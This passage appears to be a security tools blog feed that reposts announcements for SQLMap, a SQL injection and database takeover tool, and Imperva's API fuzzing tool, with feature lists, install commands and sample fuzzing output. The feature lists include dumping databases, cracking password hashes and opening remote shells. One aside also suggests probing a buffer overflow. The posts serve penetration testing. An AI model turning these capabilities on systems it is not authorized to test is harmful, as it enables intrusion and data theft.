<li style="text-align: justify;">Support to <strong>establish an out-of-band stateful TCP connection between the attacker machine and the database server</strong> underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.</li>
<li style="text-align: justify;">Support for <strong>database process' user privilege escalation</strong> via Metasploit's Meterpreter <code>getsystem</code> command.</li>
</ul>
<br />
<span style="font-size: large;"><b>Installation</b></span><br />
You can download the latest tarball by clicking <a href="https://github.com/sqlmapproject/sqlmap/tarball/master" rel="nofollow" target="_blank">here</a> or latest zipball by clicking <a href="https://github.com/sqlmapproject/sqlmap/zipball/master" rel="nofollow" target="_blank">here</a>.<br />
Preferably, you can download sqlmap by cloning the <a href="https://github.com/sqlmapproject/sqlmap" rel="nofollow" target="_blank">Git</a> repository:<br />
<pre><code>git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev</code></pre>
sqlmap works out of the box with <a href="http://www.python.org/download/" rel="nofollow" target="_blank">Python</a> version <strong>2.6.x</strong> and <strong>2.7.x</strong> on any platform.<br />
<br />
<span style="font-size: large;"><b>Usage</b></span><br />
To get a list of basic options and switches use:<br />
<pre><code>python sqlmap.py -h</code></pre>
To get a list of all options and switches use:<br />
<pre><code>python sqlmap.py -hh</code></pre>
You can find a sample run <a href="https://asciinema.org/a/46601" rel="nofollow" target="_blank">here</a>. To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the <a href="https://github.com/sqlmapproject/sqlmap/wiki/Usage" rel="nofollow" target="_blank">user's manual</a>.<br />
<br />
<span style="font-size: large;"><b>Links</b></span><br />
<ul>
<li>Homepage: <a href="http://sqlmap.org/" rel="nofollow" target="_blank">http://sqlmap.org</a></li>
<li>Download: <a href="https://github.com/sqlmapproject/sqlmap/tarball/master" rel="nofollow" target="_blank">.tar.gz</a> or <a href="https://github.com/sqlmapproject/sqlmap/zipball/master" rel="nofollow" target="_blank">.zip</a></li>
<li>Commits RSS feed: <a href="https://github.com/sqlmapproject/sqlmap/commits/master.atom" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/commits/master.atom</a></li>
<li>Issue tracker: <a href="https://github.com/sqlmapproject/sqlmap/issues" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/issues</a></li>
<li>User's manual: <a href="https://github.com/sqlmapproject/sqlmap/wiki" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki</a></li>
<li>Frequently Asked Questions (FAQ): <a href="https://github.com/sqlmapproject/sqlmap/wiki/FAQ" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki/FAQ</a></li>
<li>Twitter: <a href="https://twitter.com/sqlmap" rel="nofollow" target="_blank">@sqlmap</a></li>
<li>Demos: <a href="http://www.youtube.com/user/inquisb/videos" rel="nofollow" target="_blank">http://www.youtube.com/user/inquisb/videos</a></li>
<li>Screenshots: <a href="https://github.com/sqlmapproject/sqlmap/wiki/Screenshots" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki/Screenshots</a></li>
</ul>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/sqlmapproject/sqlmap" rel="nofollow" target="_blank">Download SQLMap v1.4</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-15472594231610881272019-12-19T17:30:00.000-03:002019-12-19T17:30:13.026-03:00Automatic API Attack Tool - Customizable API Attack Tool Takes An API Specification As An Input, Generates And Runs Attacks That Are Based On It As An Output<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-9iVNr9x-Z7U/XfmLw46gfLI/AAAAAAAARIw/wNS1genvno0KvL0CwRh1MK5jvCHmDYPEgCNcBGAsYHQ/s1600/Automatic%2BAPI%2BAttack%2BTool.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="328" data-original-width="507" height="414" src="https://1.bp.blogspot.com/-9iVNr9x-Z7U/XfmLw46gfLI/AAAAAAAARIw/wNS1genvno0KvL0CwRh1MK5jvCHmDYPEgCNcBGAsYHQ/s640/Automatic%2BAPI%2BAttack%2BTool.png" width="640" /></a></div>
<br />
Imperva's customizable API attack tool takes an API specification as an input, and generates and runs attacks that are based on it as an output.<br />
The tool is able to parse an API specification and create fuzzing attack scenarios based on what is defined in the API specification. Each endpoint is injected with cleverly generated values within the boundaries defined by the specification, and outside of it, the appropriate requests are sent and their success or failure are reported in a detailed manner. You may also extend it to run various security attack vectors, such as illegal resource access, XSS, SQLi and RFI, that are targeted at the existing endpoints, or even at non-existing ones. <strong>No human intervention is needed. Simply run the tool and get the results.</strong><br />
The tool can be easily extended to adapt to meet the various needs, such as for a developer who wants to test their API, or an organization that wants to run regular <a href="https://www.kitploit.com/search/label/Vulnerability" target="_blank" title="vulnerability">vulnerability</a> or positive security scans on its public API. It is built with CI/CD in mind.<br />
<a name='more'></a><br />
<span style="font-size: large;"><b>Requirements</b></span><br />
<ul>
<li>Java 8 or higher</li>
<li>Gradle</li>
</ul>
<br />
<span style="font-size: large;"><b>Running</b></span><br />
<ul>
<li>Check out the code from GitHub and run 'gradle build'</li>
<li>You may find the executable jar under the build/libs folder</li>
<li>Run 'java -jar imperva-api-attack-tool.jar' to see the help menu</li>
</ul>
<br />
<span style="font-size: large;"><b>Making a Linux executable</b></span><br />
<ul>
<li>Copy the runnable.sh file from the src/main/resources folder, to the same directory with the jar file.</li>
<li>Now run: 'cat runnable.sh imperva-api-attack-tool.jar > api-attack.sh && chmod +x api-attack.sh'</li>
<li>You may use the api-attack.sh file as a regular executable</li>
</ul>
<br />
<span style="font-size: large;"><b>Usage</b></span><br />
<br />
<b>Required parameters:</b><br />
-f, --specFile=<em>specFilePath</em><br />
<blockquote>
The API specification file (swagger 2.0) to run on. JSON/YAML format. For better results, make sure responses are well defined for each endpoint.</blockquote>
-n, --hostName=<em>hostName</em><br />
<blockquote>
The host name to connect to. It can also be an IP</blockquote>
-s, --hostScheme=<em>hostScheme</em><br />
<blockquote>
Connection to host will be made using this scheme; e.g: https or http</blockquote>
<br />
<b>Optional parameters:</b><br />
-p, --hostPort=<em>hostPort</em><br />
<blockquote>
The port the host is listening on for API calls, default is: 443</blockquote>
-ph, --proxyHost=<em>proxyHost</em><br />
<blockquote>
Specify the proxy host to send the requests via a proxy</blockquote>
-pp, --proxyPort=<em>proxyPort</em><br />
<blockquote>
The proxy port, default is: 80</blockquote>
-rcn, --addNegativeRC=<em>responseCode[,responseCode...]</em><br />
<blockquote>
Additional response codes to be accepted in negative attacks (e.g. bad value attacks). Multiple values are supported, separated by commas</blockquote>
-rcp, --addPositiveRC=<em>responseCode[,responseCode...]</em><br />
<blockquote>
Additional response codes to be accepted in positive checks (legitimate value attacks). Multiple values are supported, separated by commas</blockquote>
<br />
<br />
<b>Typical usage scenarios:</b><br />
<ul>
<li> You'd like to check whether your API is protected by an API Security solution.<br />
Example run: <code>api-attack.sh -f swaggerPetStore.json -n myapisite.com -s http -rcn=403</code><br />
We've added the <code>403</code> response code as a legitimate response code for the negative checks. This is since the API Security solution blocks such requests, and returns a 403 status. The spec, on the other hand, doesn't necessarily define such a response with HTTP code of 403, for any of its endpoints. This would make such responses legitimate, in spite of them not being in the spec, and alert you when such a response is not received from a negative check. Such cases mean that you are left unprotected by your API security solution.<br />
</li>
<li> You'd like to check how your proxy mitigates API attacks, but don't have an actual site behind it.<br />
Example run: <code>api-attack.sh -f swaggerPetStore.json -n myapisite.com -s http -ph 127.0.0.1 -pp=4010 -rcn=403 -rcp=404</code><br />
This time we've added the <code>404</code> status code to the positive scenarios. So that when a scenario is not being blocked, we will not report a failure, but rather accept the legitimate <code>404</code> (resource not found) response.<br />
</li>
<li> You'd like to check whether your API handles all inputs correctly. Furthermore, you'd like to run it on a nightly basis, or even after each time a developer pushes new code to the project.<br />
Example run: <code>api-attack.sh -f myapi_swagger.yaml -n staging.myorg.com -s https</code><br />
This time we're running without any exclusions. The API specification file must declare its response codes precisely. The tool will accept only them as legitimate, and will fail the checks otherwise. See more below on conditions of failing the checks. Run the above command in a Jenkins job (or any other CI/CD software to your liking), which will be triggered by a cron, or a repo code push activity. Make sure you have the <code>TestNG</code> plugin installed, which should parse the results written in <code>build/testng-results</code>, for better <a href="https://www.kitploit.com/search/label/Visibility" target="_blank" title="visibility">visibility</a> in the CI/CD scenario.<br />
</li>
<li> You'd like to check whether this API might be open to fuzzing attempts. Simply run the tool and check the reported failures.<br />
Example run: <code>api-attack.sh -f publiclyAvailableSwaggerOfAPI.yaml -n api.corporate.com -s https</code><br />
</li>
<li> You'd like to check whether your API is implemented correctly on the server side, or that its definition corresponds the server implementation.<br />
Example run: <code>api-attack.sh -f publiclyAvailableSwaggerOfAPI.yaml -n api.corporate.com -s https</code><br />
</li>
</ul>
<br />
<b>Conditions for failing checks</b><br />
<ul>
<li>The tool verifies the generated request response code matches the declared response codes in the swagger. Yet,</li>
<li>Positive checks: if it's a clear error (code is 5xx), we will still fail the check, even if this response code is not defined in the spec, but not if you supplied an override.</li>
<li>Negative checks: if the response is not a legitimate error (1xx, 2xx, 5xx), we fail the check unless you supplied an override. If the legitimate error code is not in the spec, the check will fail as well.</li>
<li>You may use the 'default' definition in the response section of the swagger, but this is not recommended. Always define your legitimate answers precisely.</li>
</ul>
<br />
<b>Conditions for failing checks</b><br />
<ul>
<li>The tool verifies the generated request response code matches the declared response codes in the swagger. Yet,</li>
<li>Positive checks: if it's a clear error (code is 5xx), we will still fail the check, even if this response code is not defined in the spec, but not if you supplied an override.</li>
<li>Negative checks: if the response is not a legitimate error (1xx, 2xx, 5xx), we fail the check. Unless you supplied an override. If the legitimate error code is not in the spec, the check will fail as well.</li>
<li>You may use the 'default' definition in the response section of the swagger, but this is not recommended. Always define your legitimate answers precisely.</li>
</ul>
<br />
<span style="font-size: large;"><b>Expected outputs:</b></span><br />
<ul>
<li>The tool uses the testng <a href="https://www.kitploit.com/search/label/Reporting" target="_blank" title="reporting">reporting</a> framework, so any plugin that handles testng runs can be used here. Only note that the results are written under the build/testng-results folder. This can be changed, of course.</li>
<li>The tool generates requests according to its check suites, and each request checks something specific. So each check will present all the relevant details in the <a href="https://www.kitploit.com/search/label/Command%20Line" target="_blank" title="command line">command line</a> output, together with what is being checked, what the response is, and whether or not it was as expected.</li>
<li>Any bad requests will be stored in the <code>bad_requests</code> folder, so that you could analyze it later (e.g. if this is running on CI/CD server, for instance, and you don't have immediate access to the machine)</li>
<li>In the end, you will be provided with a summary</li>
</ul>
<br />
<b>Example of a negative check that failed:</b><br />
<pre><code>***** Testing API Endpoint *****
***** Test ID: 1575128763286-74212
Testing: Bad Property: /username (STRING), value: {, URL encoded: %7B
--> Url: /user/{
--> Method: GET
--> Headers: []
----------**----------
Request was: GET /user/{ [Accept: application/json], Response status code: 200(UNEXPECTED)
Response (non parsed):
{"id":0,"username":"string","firstName":"string","lastName":"string","email":"string","password":"string","phone":"string","userStatus":0}</code></pre>
Why did the check fail? The request got 200, even though didn't contain a legal URL<br />
<br />
<b>Another example:</b><br />
<pre><code>***** Testing API Endpoint *****
***** Test ID: 1575128763286-25078
Testing: Bad Property: /body/quantity (INTEGER), value: 0.4188493, URL encoded: 0.4188493
--> Url: /store/order
--> Method: POST
--> Headers: []
--> Body: {"petId":-2511515111206893939,"quantity":0.4188493,"id":698757161286106823,"shipDate":"�s","complete":"true","status":"approved"}
----------**----------
Request was: POST /store/order [Accept: application/json], Response status code: 200(UNEXPECTED)
Response (non parsed):
{"id":0,"petId":0,"quantity":0,"shipDate":"2019-11-30T15:46:03Z","status":"placed","complete":false}</code></pre>
The server expected to get an integer, but accepted a double value. This might be a good spot to try and exploit some <a href="https://www.kitploit.com/search/label/Buffer%20Overflow" target="_blank" title="buffer overflow">buffer overflow</a> in the server.<br />
<br />
<b>Example of a successful check:</b><br />
<pre><code>***** Testing API Endpoint *****
***** Test ID: 1575128763137-43035
Testing: /user/{username}
--> Url: /user/%E68E97EDB4Oq-(!BbG,Y$p'A-KW%65f9FA6jt5vvDz-cW.QGsLS+AA~RIHC3wgy25lDJsGzcT.;kJ+(
--> Method: GET
--> Headers: []
----------**----------
Request was: GET /user/%E68E97EDB4Oq-(!BbG,Y$p'A-KW%65f9FA6jt5vvDz-cW.QGsLS+AA~RIHC3wgy25lDJsGzcT.;kJ+( [Accept: application/json], Response status code: 404
Response (non parsed):
{"statusCode":404,"error":"Not Found","message":"Not Found"}</code></pre>
We supplied a username that was nonexistent but legal, according to the API specification. The server knew how to handle this request and return a legal error.<br />
<br />
<span style="font-size: large;"><b>Supported Check Scenarios</b></span><br />
We will use the term <code>endpoint</code> here, as the endpoint URL and Method tuple.<br />
<br />
<b>Positive Scenarios</b><br />
<ul>
<li>For each endpoint, creates a request with generated values for all of its parameters. These are generated randomly, but obey the rules that are defined in the API specification.</li>
<li>For each endpoint, creates a request with only the required parameters, with values generated as described above.</li>
</ul>
<br />
<b>Negative Scenarios</b><br />
<ul>
<li>For each endpoint, creates multiple requests, each which checks a different parameter. The tool does this by injecting a random bad input value in the checked parameter, and filling the rest with "positive" values which are generated in the same manner as described in the positive scenarios.</li>
</ul>
<br />
<b>Ongoing Effort</b><br />
We are working on migrating our other scenarios to the open-source tool, for the benefit of the community. Stay tuned for updates.<br />
<br />
<span style="font-size: large;"><b>Extensibility</b></span><br />
The tool is written in a way that makes it easy to extend its fuzzing and request generation functionality to meet your specific needs. Feel free to suggest any additions that others may benefit from by creating a pull request.<br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/imperva/automatic-api-attack-tool" rel="nofollow" target="_blank" title="Download Automatic-Api-Attack-Tool">Download Automatic-Api-Attack-Tool</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-16636331430212841992019-10-03T09:00:00.000-03:002019-10-03T09:00:05.157-03:00SQLMap v1.3.10 - Automatic SQL Injection And Database Takeover Tool<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-brUPrgcig0Y/XZVT58OABfI/AAAAAAAAQhI/7pL6-4mgzUwDKRdtVJy0r0WoIxIr1DCOACNcBGAsYHQ/s1600/sqlmap.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="568" data-original-width="602" src="https://1.bp.blogspot.com/-brUPrgcig0Y/XZVT58OABfI/AAAAAAAAQhI/7pL6-4mgzUwDKRdtVJy0r0WoIxIr1DCOACNcBGAsYHQ/s1600/sqlmap.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="text-align: justify;">
<b>SQLMap</b> is an open source <a href="http://www.kitploit.com/search/label/Penetration%20Testing%20Tool">penetration testing tool</a> that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful <a href="http://www.kitploit.com/search/label/Detection">detection</a> engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.</div>
<a name='more'></a><br />
<div style="text-align: justify;">
<b><span style="font-size: large;">Features</span></b></div>
<ul>
<li style="text-align: justify;">Full support for <strong>MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix</strong> database management systems.</li>
<li style="text-align: justify;">Full support for six SQL injection techniques: <strong>boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band</strong>.</li>
<li style="text-align: justify;">Support to <strong>directly connect to the database</strong> without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.</li>
<li style="text-align: justify;">Support to enumerate <strong>users, password hashes, privileges, roles, databases, tables and columns</strong>.</li>
<li style="text-align: justify;">Automatic recognition of password hash formats and support for <strong>cracking them using a dictionary-based attack</strong>.</li>
<li style="text-align: justify;">Support to <strong>dump database tables</strong> entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.</li>
<li style="text-align: justify;">Support to <strong>search for specific database names, specific tables across all databases or specific columns across all databases' tables</strong>. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain string like name and pass.</li>
<li style="text-align: justify;">Support to <strong>download and upload any file</strong> from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.</li>
<li style="text-align: justify;">Support to <strong>execute arbitrary commands and retrieve their standard output</strong> on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.</li>
<li style="text-align: justify;">Support to <strong>establish an out-of-band stateful TCP connection between the attacker machine and the database server</strong> underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.</li>
<li style="text-align: justify;">Support for <strong>database process' user privilege escalation</strong> via Metasploit's Meterpreter <code>getsystem</code> command.</li>
</ul>
<br />
<span style="font-size: large;"><b>Installation</b></span><br />
You can download the latest tarball by clicking <a href="https://github.com/sqlmapproject/sqlmap/tarball/master" rel="nofollow" target="_blank">here</a> or latest zipball by clicking <a href="https://github.com/sqlmapproject/sqlmap/zipball/master" rel="nofollow" target="_blank">here</a>.<br />
Preferably, you can download sqlmap by cloning the <a href="https://github.com/sqlmapproject/sqlmap" rel="nofollow" target="_blank">Git</a> repository:<br />
<pre><code>git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev</code></pre>
sqlmap works out of the box with <a href="http://www.python.org/download/" rel="nofollow" target="_blank">Python</a> version <strong>2.6.x</strong> and <strong>2.7.x</strong> on any platform.<br />
<br />
<span style="font-size: large;"><b>Usage</b></span><br />
To get a list of basic options and switches use:<br />
<pre><code>python sqlmap.py -h</code></pre>
To get a list of all options and switches use:<br />
<pre><code>python sqlmap.py -hh</code></pre>
You can find a sample run <a href="https://asciinema.org/a/46601" rel="nofollow" target="_blank">here</a>. To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the <a href="https://github.com/sqlmapproject/sqlmap/wiki/Usage" rel="nofollow" target="_blank">user's manual</a>.<br />
<br />
<b><span style="font-size: large;">Demo</span></b><br />
<div style="text-align: center;">
<script async="" id="asciicast-46601" src="https://asciinema.org/a/46601.js"></script>
</div>
<br />
<span style="font-size: large;"><b>Links</b></span><br />
<ul>
<li>Homepage: <a href="http://sqlmap.org/" rel="nofollow" target="_blank">http://sqlmap.org</a></li>
<li>Download: <a href="https://github.com/sqlmapproject/sqlmap/tarball/master" rel="nofollow" target="_blank">.tar.gz</a> or <a href="https://github.com/sqlmapproject/sqlmap/zipball/master" rel="nofollow" target="_blank">.zip</a></li>
<li>Commits RSS feed: <a href="https://github.com/sqlmapproject/sqlmap/commits/master.atom" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/commits/master.atom</a></li>
<li>Issue tracker: <a href="https://github.com/sqlmapproject/sqlmap/issues" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/issues</a></li>
<li>User's manual: <a href="https://github.com/sqlmapproject/sqlmap/wiki" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki</a></li>
<li>Frequently Asked Questions (FAQ): <a href="https://github.com/sqlmapproject/sqlmap/wiki/FAQ" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki/FAQ</a></li>
<li>Twitter: <a href="https://twitter.com/sqlmap" rel="nofollow" target="_blank">@sqlmap</a></li>
<li>Demos: <a href="http://www.youtube.com/user/inquisb/videos" rel="nofollow" target="_blank">http://www.youtube.com/user/inquisb/videos</a></li>
<li>Screenshots: <a href="https://github.com/sqlmapproject/sqlmap/wiki/Screenshots" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki/Screenshots</a></li>
</ul>
<br />
<span style="font-size: large;"><b>Translations</b></span><br />
<ul>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-bg-BG.md" rel="nofollow" target="_blank">Bulgarian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md" rel="nofollow" target="_blank">Chinese</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md" rel="nofollow" target="_blank">Croatian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fr-FR.md" rel="nofollow" target="_blank">French</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md" rel="nofollow" target="_blank">Greek</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md" rel="nofollow" target="_blank">Indonesian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-it-IT.md" rel="nofollow" target="_blank">Italian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md" rel="nofollow" target="_blank">Japanese</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md" rel="nofollow" target="_blank">Portuguese</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md" rel="nofollow" target="_blank">Spanish</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md" rel="nofollow" target="_blank">Turkish</a></li>
</ul>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/sqlmapproject/sqlmap" rel="nofollow" target="_blank">Download SQLMap v1.3.10</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-21345563204120235172019-08-09T08:30:00.000-04:002019-08-09T08:30:01.109-04:00SQLMap v1.3.8 - Automatic SQL Injection And Database Takeover Tool<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-X_y3UTZPtEY/XUySCNtl9nI/AAAAAAAAP8g/fWDiZHjjXGI9oObGiTtO1-FMmZvoXwjuACLcBGAs/s1600/sqlmap_1.3.8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="536" data-original-width="601" height="570" src="https://1.bp.blogspot.com/-X_y3UTZPtEY/XUySCNtl9nI/AAAAAAAAP8g/fWDiZHjjXGI9oObGiTtO1-FMmZvoXwjuACLcBGAs/s640/sqlmap_1.3.8.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="text-align: justify;">
<b>SQLMap</b> is an open source <a href="http://www.kitploit.com/search/label/Penetration%20Testing%20Tool">penetration testing tool</a> that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful <a href="http://www.kitploit.com/search/label/Detection">detection</a> engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.</div>
<a name='more'></a><br />
<div style="text-align: justify;">
<b><span style="font-size: large;">Features</span></b></div>
<ul>
<li style="text-align: justify;">Full support for <strong>MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix</strong> database management systems.</li>
<li style="text-align: justify;">Full support for six SQL injection techniques: <strong>boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band</strong>.</li>
<li style="text-align: justify;">Support to <strong>directly connect to the database</strong> without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.</li>
<li style="text-align: justify;">Support to enumerate <strong>users, password hashes, privileges, roles, databases, tables and columns</strong>.</li>
<li style="text-align: justify;">Automatic recognition of password hash formats and support for <strong>cracking them using a dictionary-based attack</strong>.</li>
<li style="text-align: justify;">Support to <strong>dump database tables</strong> entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.</li>
<li style="text-align: justify;">Support to <strong>search for specific database names, specific tables across all databases or specific columns across all databases' tables</strong>. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain string like name and pass.</li>
<li style="text-align: justify;">Support to <strong>download and upload any file</strong> from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.</li>
<li style="text-align: justify;">Support to <strong>execute arbitrary commands and retrieve their standard output</strong> on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.</li>
<li style="text-align: justify;">Support to <strong>establish an out-of-band stateful TCP connection between the attacker machine and the database server</strong> underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.</li>
<li style="text-align: justify;">Support for <strong>database process' user privilege escalation</strong> via Metasploit's Meterpreter <code>getsystem</code> command.</li>
</ul>
<br />
<span style="font-size: large;"><b>Installation</b></span><br />
You can download the latest tarball by clicking <a href="https://github.com/sqlmapproject/sqlmap/tarball/master" rel="nofollow" target="_blank">here</a> or latest zipball by clicking <a href="https://github.com/sqlmapproject/sqlmap/zipball/master" rel="nofollow" target="_blank">here</a>.<br />
Preferably, you can download sqlmap by cloning the <a href="https://github.com/sqlmapproject/sqlmap" rel="nofollow" target="_blank">Git</a> repository:<br />
<pre><code>git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev</code></pre>
sqlmap works out of the box with <a href="http://www.python.org/download/" rel="nofollow" target="_blank">Python</a> version <strong>2.6.x</strong> and <strong>2.7.x</strong> on any platform.<br />
<br />
<span style="font-size: large;"><b>Usage</b></span><br />
To get a list of basic options and switches use:<br />
<pre><code>python sqlmap.py -h</code></pre>
To get a list of all options and switches use:<br />
<pre><code>python sqlmap.py -hh</code></pre>
You can find a sample run <a href="https://asciinema.org/a/46601" rel="nofollow" target="_blank">here</a>. To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the <a href="https://github.com/sqlmapproject/sqlmap/wiki/Usage" rel="nofollow" target="_blank">user's manual</a>.<br />
<br />
<b><span style="font-size: large;">Demo</span></b><br />
<div style="text-align: center;">
<script async="" id="asciicast-46601" src="https://asciinema.org/a/46601.js"></script>
</div>
<br />
<span style="font-size: large;"><b>Links</b></span><br />
<ul>
<li>Homepage: <a href="http://sqlmap.org/" rel="nofollow" target="_blank">http://sqlmap.org</a></li>
<li>Download: <a href="https://github.com/sqlmapproject/sqlmap/tarball/master" rel="nofollow" target="_blank">.tar.gz</a> or <a href="https://github.com/sqlmapproject/sqlmap/zipball/master" rel="nofollow" target="_blank">.zip</a></li>
<li>Commits RSS feed: <a href="https://github.com/sqlmapproject/sqlmap/commits/master.atom" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/commits/master.atom</a></li>
<li>Issue tracker: <a href="https://github.com/sqlmapproject/sqlmap/issues" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/issues</a></li>
<li>User's manual: <a href="https://github.com/sqlmapproject/sqlmap/wiki" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki</a></li>
<li>Frequently Asked Questions (FAQ): <a href="https://github.com/sqlmapproject/sqlmap/wiki/FAQ" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki/FAQ</a></li>
<li>Twitter: <a href="https://twitter.com/sqlmap" rel="nofollow" target="_blank">@sqlmap</a></li>
<li>Demos: <a href="http://www.youtube.com/user/inquisb/videos" rel="nofollow" target="_blank">http://www.youtube.com/user/inquisb/videos</a></li>
<li>Screenshots: <a href="https://github.com/sqlmapproject/sqlmap/wiki/Screenshots" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki/Screenshots</a></li>
</ul>
<br />
<span style="font-size: large;"><b>Translations</b></span><br />
<ul>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-bg-BG.md" rel="nofollow" target="_blank">Bulgarian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md" rel="nofollow" target="_blank">Chinese</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md" rel="nofollow" target="_blank">Croatian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fr-FR.md" rel="nofollow" target="_blank">French</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md" rel="nofollow" target="_blank">Greek</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md" rel="nofollow" target="_blank">Indonesian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-it-IT.md" rel="nofollow" target="_blank">Italian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md" rel="nofollow" target="_blank">Japanese</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md" rel="nofollow" target="_blank">Portuguese</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md" rel="nofollow" target="_blank">Spanish</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md" rel="nofollow" target="_blank">Turkish</a></li>
</ul>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/sqlmapproject/sqlmap" rel="nofollow" target="_blank">Download SQLMap v1.3.8</a></span></b></div>
